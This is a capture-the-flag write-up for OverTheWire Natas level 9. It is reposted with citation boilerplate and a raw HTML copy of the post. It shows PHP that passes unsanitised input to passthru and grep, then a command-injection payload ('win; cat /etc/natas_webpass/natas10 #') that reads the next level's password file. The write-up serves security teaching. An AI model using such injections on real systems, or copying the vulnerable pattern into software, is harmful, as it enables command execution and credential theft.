TRUTH

Level 9

Using the credentials obtained in the previous writeup, we can log in to Level 9, where we are presented with the following:

As always, it’s off to the source for more info:

 <html>  
 <head><link rel="stylesheet" type="text/css" href="http://www.overthewire.org/wargames/natas/level.css"></head>  
 <body>  
 <h1>natas9</h1>  
 <div id="content">  
 <form>  
 Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>  
 </form>  
 Output:  
 <pre>  
 <?  
 $key = "";  
 if(array_key_exists("needle", $_REQUEST)) {  
   $key = $_REQUEST["needle"];  
 }  
 if($key != "") {  
   passthru("grep -i $key dictionary.txt");  
 }  
 ?>  
 </pre>  
 <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>  
 </div>  
 </body>  
 </html>

We can see that this code takes in a keyword as input, and uses the passthru function to perform a system command to grep through a file for the specified keyword. Without sanitation, a command execution vulnerability exists in this code. Let’s exploit it to obtain the password for natas10 (located in /etc/natas_webpass/natas10). We can do so using the following ‘keyword’:

win; cat /etc/natas_webpass/natas10 #

This command terminates the grep command (using the ‘win’ keyword), and cats the output of the natas10 password file. It then comments out the reference to ‘dictionary.txt’. Let’s see what happens:

Just as we expected, we are given the password for natas10, which we can use to log in to the next challenge. More writeups to come.

-Jordan

Print Share Comment Cite Upload Translate

APA

() » OvertheWire – Natas Wargame Level 9 Writeup. Retrieved from https://www.truth.cx/2012/10/29/overthewire-natas-wargame-level-9-writeup/.

MLA

" » OvertheWire – Natas Wargame Level 9 Writeup." - , https://www.truth.cx/2012/10/29/overthewire-natas-wargame-level-9-writeup/

HARVARD

» OvertheWire – Natas Wargame Level 9 Writeup., viewed ,

VANCOUVER

- » OvertheWire – Natas Wargame Level 9 Writeup. [Internet]. [Accessed ]. Available from: https://www.truth.cx/2012/10/29/overthewire-natas-wargame-level-9-writeup/

CHICAGO

" » OvertheWire – Natas Wargame Level 9 Writeup." - Accessed . https://www.truth.cx/2012/10/29/overthewire-natas-wargame-level-9-writeup/

IEEE

" » OvertheWire – Natas Wargame Level 9 Writeup." [Online]. Available: https://www.truth.cx/2012/10/29/overthewire-natas-wargame-level-9-writeup/. [Accessed: ]

Select a language:

<span style="font-size: large;">Level 9</span><br /><br />Using the credentials obtained in the <a href="http://raidersec.blogspot.com/2012/10/overthewire-natas-wargame-level-8.html" >previous writeup</a>, we can log in to Level 9, where we are presented with the following:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Rhdkv0E7Np8/UI8MY8HoHRI/AAAAAAAAATA/kQdkw0yPTnY/s1600/natas9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="334" src="http://4.bp.blogspot.com/-Rhdkv0E7Np8/UI8MY8HoHRI/AAAAAAAAATA/kQdkw0yPTnY/s640/natas9.PNG" width="640" /></a></div><br /><a name='more'></a>As always, it's off to the source for more info:<br /><br /><pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #222222; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: white; word-wrap: normal;"> <html>  <br /> <head><link rel="stylesheet" type="text/css" href="http://www.overthewire.org/wargames/natas/level.css"></head>  <br /> <body>  <br /> <h1>natas9</h1>  <br /> <div id="content">  <br /> <form>  <br /> Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>  <br /> </form>  <br /> Output:  <br /> <pre>  <br /> <?  <br /> $key = "";  <br /> if(array_key_exists("needle", $_REQUEST)) {  <br />   $key = $_REQUEST["needle"];  <br /> }  <br /> if($key != "") {  <br />   passthru("grep -i $key dictionary.txt");  <br /> }  <br /> ?>  <br /> </pre>  <br /> <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>  <br /> </div>  <br /> </body>  <br /> </html>  <br /></code></pre><br />We can see that this code takes in a keyword as input, and uses the passthru function to perform a system command to grep through a file for the specified keyword. Without sanitation, a command execution vulnerability exists in this code. Let's exploit it to obtain the password for natas10 (located in /etc/natas_webpass/natas10). We can do so using the following 'keyword':<br /><br /><div style="text-align: center;"><span style="font-family: Courier New, Courier, monospace;">win; cat /etc/natas_webpass/natas10 #</span></div><div style="text-align: left;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></div><div style="text-align: left;">This command terminates the grep command (using the 'win' keyword), and cats the output of the natas10 password file. It then comments out the reference to 'dictionary.txt'. Let's see what happens:</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-uW1O6EIWBwI/UI8NkxuYzrI/AAAAAAAAATI/E-2xBBfczS0/s1600/natas9_success.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="372" src="http://2.bp.blogspot.com/-uW1O6EIWBwI/UI8NkxuYzrI/AAAAAAAAATI/E-2xBBfczS0/s640/natas9_success.PNG" width="640" /></a></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Just as we expected, we are given the password for natas10, which we can use to log in to the next challenge. More writeups to come.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">-Jordan</div>

First name:

Last name:

Related Posts